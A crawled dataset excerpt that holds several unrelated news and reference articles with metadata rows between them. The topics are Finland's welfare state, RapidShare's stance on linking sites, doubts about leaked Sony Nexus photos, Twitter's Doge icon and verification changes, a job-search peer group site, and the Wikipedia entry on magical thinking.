metrics but has also kept social protections in place. Like doting parents trying to spur an underperforming child, American liberals seem to periodically ask, "Why can't you be more like your brother?" It's a good debate to have, and in some ways, it seems like there's no reason why the U.S. shouldn't borrow from Finland or any other Nordic country -- we're richer and just as committed to improving education and health, after all. Here's the difference: Finland's welfare system was hardwired into its economic development strategy, and it hasn't been seriously challenged by any major political group since. And just as Finland was ramping up its protections for workers, families, and the poor in the 1960s, Americans began to sour on the idea of "welfare" altogether. What's more, some economists argue that it's *because *of all that American capitalism contributes to the global economy that countries like Finland -- kinder, gentler, but still wealthy -- can afford to pamper their citizens. With actual Pampers, no less. *** Let's start with mandatory maternity leave, a favorite topic among the having-it-all, Leaning-In crowd. The U.S is one of the last countries on earth without it, but the Finnish state mandates four months of paid maternity leave, and on top of that, the mother and father can share an additional six-month "parental leave" period, with pay. After that, kids can either continue staying home with their mothers until they reach school age, or parents can instead send them to a publicly subsidized child-care center, where the providers are all extensively trained. The cost is on a sliding scale based on family income, but the *maximum* comes out to about $4,000 a year, compared with $10,000 for comparable care in the U.S. This is just one of the many reasons Finland is "the best place to be a mom," as the nonprofit Save the Children declared in May. Can't get a job? Not to worry. Unemployment insurance in Finland lasts for 500 days, after which you can collect a means-tested Labor Market Subsidy for an essentially indefinite period of time. (The unemployment rate is a high-but-not-awful 8.2 percent). At this point, if you've literally turned green with envy and need to see a doctor, you're in luck! In addition to dirt-cheap universal healthcare, Finland offers compensation for wages you might have lost while you were away from work, as well as a "Special Care Allowance" if you need to take some time off to take care of your sick kids. All of this adds up to the stress equivalent of living in what is essentially a vast, reindeer-fur-lined yoga studio. "It seems to me that people in Finland are more secure and less anxious than Americans because there is a threshold below which they won't fall," said Linda Cook, a political scientist at Brown University who has studied European welfare states. "Even if they face unemployment or illness, Finns will have some payments from the state, public health care and education." *** The Finns didn't always have it this good. For much of the early 20th century, Finland was agrarian and underdeveloped, with a GDP per capita trailing other Nordic countries by 30 to 40 percent in 1900. One advantage Finland did have, however, was enlightened policies towards gender. The country focused on beefing up child and maternal care in large part because women were at the core of Finland's independence and nation-building efforts at the turn of the 20th century. Finnish women were the second in the world to get the vote in 1906, and they were heavily represented in the country's first parliament. Ellen Marakowitz, a lecturer at Columbia University who studies Finland, argues that because women helped form modern Finland, things like maternity leave and child benefits naturally shaped its welfare structure decades later. "You have a state system that was built on issues concerning Finnish citizens, both men and women, rather than women's rights," she said. "Government was created in this equal footing for men and women." Finland's strong trade unions pioneered its initial worker protections, but the state soon took those functions over. Today, roughly 75 to 80 percent of Finns are union members (it's about 11 percent in the U.S.), and the groups dictate the salaries and working conditions for large swaths of the population. And as the country worked to industrialize in the 1960s, its economic policymakers took on a mentality similar to that of CEOs at tech companies with awesome employee perks like free string cheese and massages. "The thinking was, 'for a country of 5 million, we don't have many resources to waste. If people are happy, they'll maximize their work ethic, and we can develop,'" says Andrew Nestingen, a professor who leads the Finnish studies program at the University of Washington. The theory of the welfare state was that "everyone should get a slice of the cake so that they have what they need to realize their life projects." The country's unemployment and disability system was in place by 1940, and subsequent decades saw the expansion of child benefits and health insurance. Meanwhile, thanks to the country's strong agrarian tradition, the party that represents the rural part of Finland pushed through subsidies for stay-at-home (or stay-on-farm, in their case) mothers -- thus the current smorgasbord of inexpensive child-care options. Over time, Finland was able to create its "cake" -- and give everyone a slice -- in large part because its investments in human capital and education paid off. In a sense, welfare *worked* for Finland, and they've never looked back. "In the Finnish case, this has really been a part of our success story when it comes to economic growth and prosperity," said Susanna Fellman, a Finn who is now a professor of economic history at the University of Gothenburg in Sweden. "The free daycare and health-care has made it possible for two breadwinners -- women can make careers even if they have children. This is also something that promotes growth." With this setup, Finns have incredible equality and very little poverty -- but they don't get to buy as much stuff. The OECD gives the U.S. a 10 when it comes to household income, the highest score, while Finland gets a measly 3.5. And there are some major lifestyle differences: Finns live in houses and apartments that are about half the size of Americans', and their taxes on the wealthy, like those on capital gains, are much higher than ours. (Hence why taxes make up a huge chunk of their GDP.) Professionals such as doctors make far less there, which helps medical care to stay reasonably priced. (The conservative Heritage Foundation ranks Finland as downright "repressed" in some categories, like government spending, on its "Index of Economic Freedom.") It's also worth noting that Finland isn't a total economic Wonderland, either: It's not growing very fast and will probably have issues with its aging population in coming years. The Bank of Finland recently predicted that the country might soon exceed the 60 percent debt-to-GDP ratio mandated by the European Union -- a common problem in Europe these days. Some of Finland's more conservative politicians have suggested cutting public benefits there in the wake of the economic downturn -- but even with those cuts, social protections there would still be far more generous than ours. And the economic redistribution there doesn't always work perfectly. Some municipalities inevitably find themselves with lower-quality hospitals and day cares, even when they're supposed to be roughly identical, and recently some pro-business groups have tried to edge the country toward greater privatization (though unions have pushed back.) Still, the country's small, well-educated population and investments in technology have allowed it to avoid some of the problems currently plaguing other, similarly socialist European countries. Overall, most Finns love the welfare system that loves them back. I asked my cousin's husband, Reijo, why he was willing to support such an arrangement even though he works full time. "Money isn't everything. We value equality, not inequality," he said. Fair enough. But does he have any gripes about the Finnish way? Anything he would change? Perhaps kick some of those freeloaders off their indefinite unemployment? No, he said, but he did point to one small issue: "I think that for university students it is not yet good enough. Many students have to work while they are studying." *** Like Finland, the U.S. also set up massive safety-net programs, in the form of Medicare and Medicaid, in the 1960s. But paradoxically, many Americans began developing a deep aversion to government handouts at the same time. The 1960s saw a rise in poverty and children born out of wedlock, particularly in urban communities. Sensational media stories about families "abusing" welfare -- especially when the putative abusers were portrayed as African-American -- helped cement opposition to public assistance. One study found that in the early 1970s, nearly three-quarters of magazine stories about welfare or poverty featured images of African-Americans, even though African Americans comprised only about a third of welfare recipients. "I do think that racial divisions are an important factor here -- the sense among many people that universal benefits will take from 'us' and give to 'them' -- to a part of society that is seen as different, less deserving, imagined as racially different," Cook, from Brown University, said. "I think that many middle-class Americans favor social benefits for what they see as 'deserving' people who have worked and earned them -- so Medicare is good -- but universal health care would provide benefits for people who are imagined as not deserving." In a 1976 speech, Ronald Reagan made mention of supposed "welfare queens" who make six-figure salaries while drawing government funds, stoking a sense of outrage over perceived waste in public assistance. (It was later shown that he used an exaggerated anecdote). Arguing that social insurance dis-incentivized work, and prioritizing markets and individual liberty, the growing new conservative movement eventually joined together businesses and working-class voters in pushing for cuts in government programs. Though we seemingly support spending on the sick, poor, and elderly, in 2006, 46 percent of Americans still thought the government spent "too much" on welfare, even 10 years after a total structural overhaul of welfare had passed. Jefferey Sellers, a University of Southern California political scientist, found another key difference between the two nations: Finland has much more powerful local governments than the U.S., and they're tasked with executing the myriad functions of the welfare system -- from helping the poor to operating the day cares. Municipal taxes are redistributed and supplemented with grants, thus largely eliminating the problem of under-resourced areas. Local public expenditures are 20 percent of GDP in Finland, but just 10 percent in the U.S., he points out. "The national government provides local governments with the financial means, legal powers, and the expertise to perform well," he said. Meanwhile, "Fiscal redistribution among local governments assures equality in how those services are distributed." What's more, some economists argue that the only way countries like Finland can be so well-off and yet so cushy is because countries like the U.S. create the technology that powers the rest of the world -- with huge rewards for success but few safety nets in the case of failure. "The entire world benefits because of Apple's iPhones," said Daron Acemoglu, an economist at MIT, admitting it was a relatable but not necessarily optimal example (Finland gave us Nokia and Linux's Linus Torvalds, after all). "If the United States did not provide incentives for Apple to come up with and develop the iPhone, then the entire world economy would lose the benefits it obtains from this product. The cutthroat reward structure in the United States is encouraging the creation of many products and technologies like this." If America were to adopt some of Finland's "cuddly" benefits, the thinking goes, the entire world economy might slow down. For Finns, it would be out with the baby boxes, in with the subsistence farming again. So what about education reform, then? Finnish school expert Pasi Sahlberg has written that Finnish schools are based on "improving the teaching force, limiting student testing to a necessary minimum, and placing responsibility and trust before accountability." It's true that Finnish teachers design their own curricula and don't have to deal with test-score-based evaluations, but school officials there are also placing young minds in very well-equipped hands: All teachers have graduate degrees in education and their subject areas of expertise. And schools are funded based on need, so the most struggling schools get the most resources. There is no "Teach for Finland," as Sahlberg has said. But in some ways, even the Finnish way of educating requires a strong welfare system as a foundation. The country has an extremely low child-poverty rate, which likely makes teaching without testing or score-keeping much easier. And how many American teachers would love to get a master's degree but aren't willing to take on the student loans that come with it? "The easiest [explanation] is to say that Finland seems to be a well-performing system overall, as far as the international rankings are considered," Sahlberg told me. "So, it is no wonder the education system also works well." The no-testing model also makes sense for a culture that's low on one-upmanship: "I think one of the more important things is that there's less of an emphasis on competition in Finland," Marakowitz said. "Many Finnish children don't know how to read before they go to school, and you need a certain kind of cultural setting for that. Some U.S. parents would be quite freaked out." *** When Americans hold up Finland as a model, their arguments are usually dismissed with two indisputable facts: Finland is indeed much smaller than the U.S., making it easier to disperse generous benefits on a national scale. It's also far more homogeneous, making disputes over payouts less frequent and less racially charged. Still, Cook says, the claims of homogeneity are a bit over-stated. Finland has both sizeable Swedish- and Russian-speaking communities, and right-leaning parties like the "True Finns" want to pare back the little immigration the country does have. (Even the True Finns, though, love the welfare state.) Building on the success of Finland's local governments, individual U.S. states could conceivably be more like mini-Finlands -- just look at Massachusetts, which had a comprehensive health-care system before the rest of the nation. But creating and enforcing 50 separate safety nets would require a level of oversight the U.S. federal government just doesn't have. Even Obamacare was challenged aggressively in court and has faced opposition from some two dozen states. Fellman described Finland's welfare state as a "virtuous circle" -- Finns' social cohesion props up the welfare state, which in turn promotes greater harmony. But in a way, America's economic competitiveness, focus on innovation, and lack of safety net all reinforce one another, too. The very reason we're so frequently googling what we can learn from "Finland's school success," after all, is that we want to stay one step ahead.
true
true
true
The country has cheaper medical care, smarter children, happier moms, better working conditions, less-anxious unemployed people, and lower student loan rates than we do. And that probably will never change.
2024-10-12 00:00:00
2013-07-11 00:00:00
null
article
theatlantic.com
The Atlantic
null
null
4,409,585
http://torrentfreak.com/rapidshare-wants-a-crackdown-on-linking-sites-120820/
RapidShare Wants A Crackdown on Linking Sites * TorrentFreak
Ernesto Van der Sar
In common with every file-sharing service, RapidShare is used by some of its members to host infringing material. While RapidShare itself has no search engine, there are many third-party websites that facilitate piracy by linking to copyrighted works stored on file-hosting sites. These websites are the real problem, RapidShare believes. This is one of the messages that RapidShare’s Chief Legal Officer Daniel Raimer is presenting at the Technology Policy Institute forum in Aspen today. Raimer joins a panel on Copyright and Piracy and informs TorrentFreak that he plans to counter the image that file-hosting sites are a problem. Raimer believes it’s important to stress that “legitimate” file-hosting services are merely offering a technology, and are not the ones facilitating piracy. This is also the point the company made in its advice to the U.S. Government earlier last week. Responding to a public consultation on the future of U.S. IP enforcement, the company emphasized that linking sites are the real problem. “Rather than enacting legislation that could stifle innovation in the cloud, the U.S. government should crack down on this critical part of the online piracy network,” the company wrote. “These very sophisticated websites, often featuring advertising, facilitate the mass indiscriminate distribution of copyrighted content on the Internet and should be the focus of US intellectual property enforcement efforts.” In addition to a crackdown on linking sites, RapidShare also believes that the U.S. Government should continue to push for voluntary industry agreements to counter piracy, instead of writing more legislation. These agreements have already been reached in the advertising business and among payment providers, and file-hosting services should not be overlooked RapidShare notes. “[The U.S. should] continue its work to secure voluntary industry agreements to address repeated online piracy and counterfeiting and include cloud storage and file hosting companies in these efforts,” they wrote. Earlier this year RapidShare published a “responsible practices” document for the file-hosting business, which they believe could be a basis for an industry agreement. While the major music labels said at the time that RapidShare’s suggestions didn’t go far enough, Raimer told TorrentFreak they are the absolute limit for the file-hoster. Raimer is convinced that when file-hosting companies take their responsibilities seriously, and when law enforcement goes after linking sites, copyright holders should have little left to complain about.
true
true
true
File-hosting service RapidShare admits that the file-hosting business has its challenges, but says that linking sites are the real problem. The company advised the U.S. Government last week that law enforcement should crack down on these websites, instead of writing new legislation that may stifle innovation. To address these piracy concerns, RapidShare's Chief Legal Officer Daniel Raimer is meeting with technology leaders and law enforcement at the Technology Policy Institute forum in Aspen today.
2024-10-12 00:00:00
2012-08-20 00:00:00
null
article
torrentfreak.com
Torrentfreak
null
null
34,038,095
https://www.netfunny.com/rhf/jokes/99/Jun/caution.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
30,273,178
https://www.eetimes.com/introducing-the-string-battery/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
7,629,647
http://filamentgroup.com/lab/picturefill_2_a/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
13,428,441
https://www.scop.io/blog/social-media-marketing-tools
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
4,675,651
http://www.androidpolice.com/2012/10/15/these-photos-may-not-show-a-leaked-sony-nexus-after-all-heres-why/
These Photos May Not Show A Leaked Sony Nexus After All – Here's Why
Liam Spradlin
Earlier today, a couple of rather exciting photos found on Picasa began hitting news sites showing what could be a leaked device called the Sony Nexus X. Of course, during Nexus season, any rumor or glance at a possible new device is always exciting, but sometimes it's worth while to take a step back and consider whether what we're looking at is actually what it appears to be. Our penchant for putting leaked images under the microscope led us to do a bit of investigating. After taking a look at the Nexus X photos, we have some doubts about their validity. First, the photos – below are resaved versions of the originals downloaded from Picasa. To do your own analysis, grab the originals here. ## What's Wrong One of the first things we noticed about the set was the photo of the front of the device. Many things about it are believable – the system buttons, sensors, camera, and earpiece are all things that should be present. What's odd however is that the screen lacks a persistent Google Search bar (found on the purported LG Nexus) and the Play Store icon lacks a label (something that can usually only be achieved using a custom launcher). These clues prompted me to take a quick look at the EXIF data for each photo (which can again be found at their home on Picasa). Here's a quick overview: What's interesting here is that the photo on the left was taken at 1:55 PM, while the screen's clock says 6:03. The photo was both shot and uploaded on October 13th, while its counterpart was shot October 14th at 5:47 AM and uploaded that same day at 12:47 PM. Additionally, the shot of the front appears to be evenly exposed across the entire frame. This would not be entirely odd, except that there is no exposure bias, and it is generally a challenge (even on well-lighted surfaces) to take a good photo of a device with an evenly-exposed display when shooting with a mobile camera (in this case, the Galaxy Nexus). While the presence of a faint reflection on the screen may lend credence to the authenticity of the shot, if the device this photo is based on was switched off, popping a screenshot on top and changing the screen layer's blend mode could achieve this effect in < 30 seconds. Here's a super quick test image I made to illustrate this: The photo of the back of the device is not without its own worries. My primary concern (other than the well-placed Google logo) is with the microUSB connector. While it wouldn't be surprising to see the microUSB connector on the side of the device, and a connector that caused a slight bump on the back of the device wouldn't be something to bat an eye at, there are a couple of problems. First, the otherwise even highlight running across the corner of the device is interrupted even before getting to the connector. Second, the black level of the adapter itself is completely different from its surrounding sideband. The connector's edges are also curiously cut and sharp. Finally, the disruption in the shadow on the side of the Nexus X is not consistent with the shape of the connector itself. Notice that the highlight created by the supposed bump cuts *inward *as it approaches the connector itself. ## So What Is It? This one isn't so easy. Looking through GSMArena's list of every Sony-made phone in existence, the Xperia Ion comes closest, but the back of the pictured device is quite different. Our best guess for the device these photos are based on is either design mockup, prototype, or other variant of the Xperia Ion. The front of the device is nearly identical (the Sony and Xperia logos can be knocked out in less than 2 minutes), and while the back features a strange chin, and different textures, it has a common Xperia camera/flash array. While we can't confirm the identity of the photographed device, there appear to be a *few* too many things wrong with the images for this to be the real deal. While something of a let-down, it isn't at all uncommon for leaked images (photographic or otherwise) to lead us astray, and we shouldn't have too long to wait to hear of Google's Nexus plans, if late-October announcement rumors are to be believed.
true
true
true
null
2024-10-12 00:00:00
2012-10-15 00:00:00
https://static1.anpoimag…sae0_image54.png
article
androidpolice.com
Android Police
null
null
35,208,089
https://www.phyl.org/
Never Search Alone
null
***New*: **Phyl Terry on Lenny's Podcast (links for Lenny's audience) – Apple Spotify YouTube a *free* support group of peer job seekers who meet regularly to help each other find jobs they love. more than 2,400 launched! Or, *first* find out more about Job Search Councils. Or, *register* a JSC you set up yourself “The Never Search Alone experience was a 10! Why? This free volunteer-driven community has already helped thousands of job seekers. We'd love to help YOU. The best thing we can do is help you join a Job Search Council (JSC). These are mutual support groups made up of peer job seekers who use the *Never Search Alone* methodology to search* together *to find good jobs. "Helped me find the right job for moving my career forward." This book's step-by-step approach will change your career – and life." Never Search Alone is like a secret unlock to the job marketplace. Get started with your Job Search Council. Join a JSCWhat are Job Search Councils? (JSC) learn more about jscs
true
true
true
Take charge of your career and find a job you love. Join a free Job Search Council
2024-10-12 00:00:00
2023-01-01 00:00:00
https://cdn.prod.website…social-share.jpg
website
null
null
null
null
12,335,563
http://www.recode.net/2016/8/18/12540686/google-uber-self-driving-cars-consumers
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
35,453,502
https://www.hollywoodreporter.com/business/digital/twitter-blue-elon-musk-doge-1235367512/
On Doge Twitter, Everything Is Meaningless
J Clara Chan
The purge siren was more like a whimper. As verified Twitter users braced for the Elon Musk–run social media company to begin removing verification badges en masse over the weekend, the Twitter product team appeared focused on something else entirely: replacing Twitter’s blue bird icon on Monday with that of a Shiba Inu, the dog associated with the Doge meme and cryptocurrency Dogecoin. Doge Twitter is emblematic of Musk’s chaotic and unfocused reign over Twitter, where features are rolled out haphazardly with little to no notice, select organizations like *The New York Times* are punished (i.e., lose their check marks) on a whim based on Musk’s uneven standards and basic site functionality — remember when users couldn’t even tweet? — isn’t a given. Aside from an “as promised” tweet by Elon, the company never even officially acknowledged why it embraced Doge as an icon, leaving it as another random moment in the Musk era. ### Related Stories The bloodbath that wasn’t is likely because there is no method for Twitter to remove verification badges en masse, as *The Washington Post* reported. In a since-deleted tweet on April 2, Musk said he would be giving “a few weeks grace” to legacy verified users to sign up for Twitter Blue “unless they tell they won’t pay now, in which we will remove [their verification badges],” which appeared to be the case with *The New York Times*’ main account. (A representative for the* Times* did not respond to requests for comment on whether the outlet has seen a decrease in engagement or reach after losing its verified status.) But as of early this week, most verified users have kept their badges, with many expressing no interest in paying for Twitter Blue, the $8/month subscription service that will verify any user with a phone number and offer other perks like a decrease in ads and a boost in visibility across the platform. If anything, a Twitter Blue subscription has become somewhat of a scarlet A on the social platform to some, with some legacy users even begging for their blue checks to be removed and 39,000 users following an account that shares tools on how to weed out and block Twitter Blue subscribers. If Musk was also counting on celebrities and top creators to absorb the $8 monthly fee in exchange for protecting their verified status, he thought wrong. “I am not paying for a blue check. That money could (and will) be going towards my extra hot lattes,” tweeted Dionne Warwick. On the organizational side, major publications like *The New York Times*, *The Washington Post* and *The* *Los Angeles Times* have all said they will not pay the $1,000/month fee to join Twitter’s verified organizations service, which gives business accounts a gold verification badge and adds an affiliate badge (a smaller version of the main account’s profile picture) to its affiliate accounts. If that was confusing to read, that’s because it is: a visual nightmare of badges next to badges, all of which mean next to nothing now. It’s a pay-for-play strategy that has not eked out much success for the cash-strapped company, as roughly 3.6 percent of legacy verified users have signed up for Twitter Blue, according to one estimate from the software developer Travis Brown, who has been tracking changes to users’ verification statuses. (Twitter has not publicly released its number of Twitter Blue subscribers.) And those who have offered to pay tend to have smaller followings on the platform, as some 49.1 percent of Twitter Blue subscribers have fewer than 1,000 followers, based on Brown’s analysis. A separate study from the web analytics firm Similarweb found that of the 2.6 million people who checked out the Twitter Blue sales page on their desktop in March, 116,000 — or about 4.5 percent — signed up for a subscription. Perhaps as an attempt to mask the low adoption numbers, Twitter also rolled out updated language on Monday to note that those with verification badges may have subscribed to Twitter Blue or were legacy accounts; previously, users were able to identify who was a Twitter Blue subscriber vs. a legacy user. For his part, Musk has not addressed the elephant in the room: that it appears few legacy users are saying they’ll pay for Twitter Blue. Instead, the mercurial CEO has spent the day laughing at his own jokes, sharing recycled meme after recycled meme. ## THR Newsletters Sign up for THR news straight to your inbox every day
true
true
true
As the once-coveted verification badge loses its meaning, a Twitter Blue subscription becomes a point of derision.
2024-10-12 00:00:00
2023-04-05 00:00:00
https://www.hollywoodrep…296&h=730&crop=1
article
hollywoodreporter.com
The Hollywood Reporter
null
null
6,076,043
http://en.wikipedia.org/wiki/Magical_thinking
Magical thinking - Wikipedia
null
# Magical thinking The neutrality of this article is disputed. (May 2024) | **Magical thinking**, or **superstitious thinking**,[1] is the belief that unrelated events are causally connected despite the absence of any plausible causal link between them, particularly as a result of supernatural effects.[1][2][3] Examples include the idea that personal thoughts can influence the external world without acting on them, or that objects must be causally connected if they resemble each other or have come into contact with each other in the past.[1][2][4] Magical thinking is a type of fallacious thinking and is a common source of invalid causal inferences.[3][5] Unlike the confusion of correlation with causation, magical thinking does not require the events to be correlated.[3] The precise definition of magical thinking may vary subtly when used by different theorists or among different fields of study. In anthropology, the posited causality is between religious ritual, prayer, sacrifice, or the observance of a taboo, and an expected benefit or recompense. In psychology, magical thinking is the belief that one's thoughts by themselves can bring about effects in the world or that thinking something corresponds with doing it.[6] These beliefs can cause a person to experience an irrational fear of performing certain acts or having certain thoughts because of an assumed correlation between doing so and threatening calamities.[1] In psychiatry, magical thinking defines false beliefs about the capability of thoughts, actions or words to cause or prevent undesirable events.[7] It is a commonly observed symptom in thought disorder, schizotypal personality disorder and obsessive-compulsive disorder.[8][9][10] ## Types [edit]### Direct effect [edit]Bronisław Malinowski's *Magic, Science and Religion* (1954) discusses another type of magical thinking, in which words and sounds are thought to have the ability to directly affect the world.[11] This type of wish fulfillment thinking can result in the avoidance of talking about certain subjects ("Speak of the devil and he'll appear"), the use of euphemisms instead of certain words, or the belief that to know the "true name" of something gives one power over it; or that certain chants, prayers, or mystical phrases will bring about physical changes in the world. More generally, it is magical thinking to take a symbol to be its referent or an analogy to represent an identity.[ citation needed] Sigmund Freud believed that magical thinking was produced by cognitive developmental factors. He described practitioners of magic as projecting their mental states onto the world around them, similar to a common phase in child development.[12] From toddlerhood to early school age, children will often link the outside world with their internal consciousness, e.g. "It is raining because I am sad." ### Symbolic approaches [edit]Another theory of magical thinking is the symbolic approach. Leading thinkers of this category, including Stanley J. Tambiah, believe that magic is meant to be expressive, rather than instrumental. As opposed to the direct, mimetic thinking of Frazer, Tambiah asserts that magic utilizes abstract analogies to express a desired state, along the lines of metonymy or metaphor.[13] An important question raised by this interpretation is how mere symbols could exert material effects. One possible answer lies in John L. Austin's concept of performativity, in which the act of saying something makes it true, such as in an inaugural or marital rite.[14] Other theories propose that magic is effective because symbols are able to affect internal psycho-physical states. They claim that the act of expressing a certain anxiety or desire can be reparative in itself.[15] ## Causes [edit]According to theories of anxiety relief and control, people turn to magical beliefs when there exists a sense of uncertainty and potential danger, and with little access to logical or scientific responses to such danger. Magic is used to restore a sense of control over circumstance. In support of this theory, research indicates that superstitious behavior is invoked more often in high stress situations, especially by people with a greater desire for control.[16][17] Another potential reason for the persistence of magic rituals is that the rituals prompt their own use by creating a feeling of insecurity and then proposing themselves as precautions.[18] Boyer and Liénard propose that in obsessive-compulsive rituals — a possible clinical model for certain forms of magical thinking — focus shifts to the lowest level of gestures, resulting in goal demotion. For example, an obsessive-compulsive cleaning ritual may overemphasize the order, direction, and number of wipes used to clean the surface. The goal becomes less important than the actions used to achieve the goal, with the implication that magic rituals can persist without efficacy because the intent is lost within the act.[18] Alternatively, some cases of harmless "rituals" may have positive effects in bolstering intent, as may be the case with certain pre-game exercises in sports.[19] Some scholars believe that magic is effective psychologically. They cite the placebo effect and psychosomatic disease as prime examples of how our mental functions exert power over our bodies.[20] Similarly, Robin Horton suggests that engaging in magical practices surrounding healing can relieve anxiety, which could have a significant positive physical effect. In the absence of advanced health care, such effects would play a relatively major role, thereby helping to explain the persistence and popularity of such practices.[21][22] ### Phenomenological approach [edit]Ariel Glucklich tries to understand magic from a subjective perspective, attempting to comprehend magic on a phenomenological, experientially based level. Glucklich seeks to describe the attitude that magical practitioners feel what he calls "magical consciousness" or the "magical experience". He explains that it is based upon "the awareness of the interrelatedness of all things in the world by means of simple but refined sense perception."[23] Another phenomenological model is that of Gilbert Lewis, who argues that "habit is unthinking". He believes that those practicing magic do not think of an explanatory theory behind their actions any more than the average person tries to grasp the pharmaceutical workings of aspirin.[24] When the average person takes an aspirin, he does not know how the medicine chemically functions. He takes the pill with the premise that there is proof of efficacy. Similarly, many who avail themselves of magic do so without feeling the need to understand a causal theory behind it. ## Social [edit]The examples and perspective in this section deal primarily with the Western world and do not represent a worldwide view of the subject. (August 2024) | ### Anthropology [edit]In religion, folk religion, and superstitious beliefs, the posited causality is between religious ritual, prayer, meditation, trances, sacrifice, incantation, curses, benediction, faith healing, or the observance of a taboo, and an expected benefit or recompense. The use of a lucky charm or ritual, for example, is assumed to increase the probability that one will perform at a level so that one can achieve a desired goal or outcome.[25] Researchers have identified two possible principles as the formal causes of the attribution of false causal relationships: - the temporal contiguity of two events - "associative thinking", the association of entities based upon their resemblance to one another Prominent Victorian theorists identified associative thinking (a common feature of practitioners of magic) as a characteristic form of irrationality. As with all forms of magical thinking, association-based and similarities-based notions of causality are not always said to be the practice of magic by a magician. For example, the doctrine of signatures held that similarities between plant parts and body parts indicated their efficacy in treating diseases of those body parts, and was a part of Western medicine during the Middle Ages. This association-based thinking is a vivid example of the general human application of the representativeness heuristic.[26] Edward Burnett Tylor coined the term "associative thinking",[27] characterizing it as pre-logical,[ citation needed] in which the "magician's folly" is in mistaking an imagined connection with a real one. The magician believes that thematically linked items can influence one another by virtue of their similarity. [28]For example, in E. E. Evans-Pritchard's account, members of the Azande tribe [29]believe that rubbing crocodile teeth on banana plants can invoke a fruitful crop. Because crocodile teeth are curved (like bananas) and grow back if they fall out, the Azande observe this similarity and want to impart this capacity of regeneration to their bananas. To them, the rubbing constitutes a means of transference. Sir James Frazer (1854–1941) elaborated upon Tylor's principle by dividing magic into the categories of sympathetic and contagious magic. The latter is based upon the law of contagion or contact, in which two things that were once connected retain this link and have the ability to affect their supposedly related objects, such as harming a person by harming a lock of his hair. Sympathetic magic and homeopathy operate upon the premise that "like affects like", or that one can impart characteristics of one object to a similar object. Frazer believed that some individuals think the entire world functions according to these mimetic, or homeopathic, principles.[30] In *How Natives Think* (1925), Lucien Lévy-Bruhl describes a similar notion of mystical, "collective representations". He too sees magical thinking as fundamentally different from a Western style of thought. He asserts that in these representations, "primitive" people's "mental activity is too little differentiated for it to be possible to consider ideas or images of objects by themselves apart from the emotions and passions which evoke those ideas or are evoked by them".[31] Lévy-Bruhl explains that the indigenous people commit the *post hoc, ergo propter hoc* fallacy, in which people observe that x is followed by y, and conclude that x has caused y.[32] He believes that this fallacy is institutionalized in native culture and is committed regularly and repeatedly. Despite the view that magic is less than rational and entails an inferior concept of causality, in *The Savage Mind* (1966), Claude Lévi-Strauss suggested that magical procedures are relatively effective in exerting control over the environment. This outlook has generated alternative theories of magical thinking, such as the symbolic and psychological approaches, and softened the contrast between "educated" and "primitive" thinking: "Magical thinking is no less characteristic of our own mundane intellectual activity than it is of Zande curing practices."[33][n 1] ### Cultural differences [edit]Robin Horton maintains that the difference between the thinking of Western and of non-Western peoples is predominantly "idiomatic". He says that the members of both cultures use the same practical common-sense, and that both science and magic are ways beyond basic logic by which people formulate theories to explain whatever occurs. However, non-Western cultures use the idiom of magic and have community spiritual figures, and therefore non-Westerners turn to magical practices or to a specialist in that idiom. Horton sees the same logic and common-sense in all cultures, but notes that their contrasting ontological idioms lead to cultural practices which seem illogical to observers whose own culture has correspondingly contrasting norms. He explains, "[T]he layman's grounds for accepting the models propounded by the scientist are often no different from the young African villager's ground for accepting the models propounded by one of his elders."[34] Along similar lines, Michael F. Brown argues that the Aguaruna of Peru see magic as a type of technology, no more supernatural than their physical tools. Brown says that the Aguaruna utilize magic in an empirical manner; for example, they discard any magical stones which they have found to be ineffective. To Brown—as to Horton—magical and scientific thinking differ merely in idiom.[35] These theories blur the boundaries between magic, science, and religion, and focus on the similarities in magical, technical, and spiritual practices. Brown even ironically writes that he is tempted to disclaim the existence of 'magic.'[36] One theory of substantive difference is that of the open versus closed society. Horton describes this as one of the key dissimilarities between traditional thought and Western science. He suggests that the scientific worldview is distinguished from a magical one by the scientific method and by skepticism, requiring the falsifiability of any scientific hypothesis. He notes that for native peoples "there is no developed awareness of alternatives to the established body of theoretical texts."[37] He notes that all further differences between traditional and Western thought can be understood as a result of this factor. He says that because there are no alternatives in societies based on magical thought, a theory does not need to be objectively judged to be valid. ## In children [edit]According to Jean Piaget's Theory of Cognitive Development,[38] magical thinking is most prominent in children between ages 2 and 7. Due to examinations of grieving children, it is said that during this age, children strongly believe that their personal thoughts have a direct effect on the rest of the world. It is posited that their minds will create a reason to feel responsible if they experience something tragic that they do not understand, e.g. a death. Jean Piaget, a developmental psychologist, came up with a theory of four developmental stages. Children between ages 2 and 7 would be classified under his preoperational stage of development. During this stage children are still developing their use of logical thinking. A child's thinking is dominated by perceptions of physical features, meaning that if the child is told that a family pet has "gone away to a farm" when it has in fact died, then the child will have difficulty comprehending the transformation of the dog not being around anymore. Magical thinking would be evident here, since the child may believe that the family pet being gone is just temporary. Their young minds in this stage do not understand the finality of death and magical thinking may bridge the gap. ### Grief [edit]It was discovered that children often feel that they are responsible for an event or events occurring or are capable of reversing an event simply by thinking about it and wishing for a change: namely, "magical thinking".[39] Make-believe and fantasy are an integral part of life at this age and are often used to explain the inexplicable.[40][41] According to Piaget, children within this age group are often "egocentric", believing that what they feel and experience is the same as everyone else's feelings and experiences.[42] Also at this age, there is often a lack of ability to understand that there may be other explanations for events outside of the realm of things they have already comprehended. What happens outside their understanding needs to be explained using what they already know, because of an inability to fully comprehend abstract concepts.[42] Magical thinking is found particularly in children's explanations of experiences about death, whether the death of a family member or pet, or their own illness or impending death. These experiences are often new for a young child, who at that point has no experience to give understanding of the ramifications of the event.[43] A child may feel that they are responsible for what has happened, simply because they were upset with the person who died, or perhaps played with the pet too roughly. There may also be the idea that if the child wishes it hard enough, or performs just the right act, the person or pet may choose to come back, and not be dead any longer.[44] When considering their own illness or impending death, some children may feel that they are being punished for doing something wrong, or not doing something they should have, and therefore have become ill.[45] If a child's ideas about an event are incorrect because of their magical thinking, there is a possibility that the conclusions the child makes could result in long-term beliefs and behaviours that create difficulty for the child as they mature.[46] ## Related terms [edit]"**Quasi-magical thinking**" describes "cases in which people act as if they erroneously believe that their action influences the outcome, even though they do not really hold that belief".[47] People may realize that a superstitious intuition is logically false, but act as if it were true because they do not exert an effort to correct the intuition.[48] ## See also [edit]- Cognitive bias - Faith - Illusion of control - Law of attraction (New 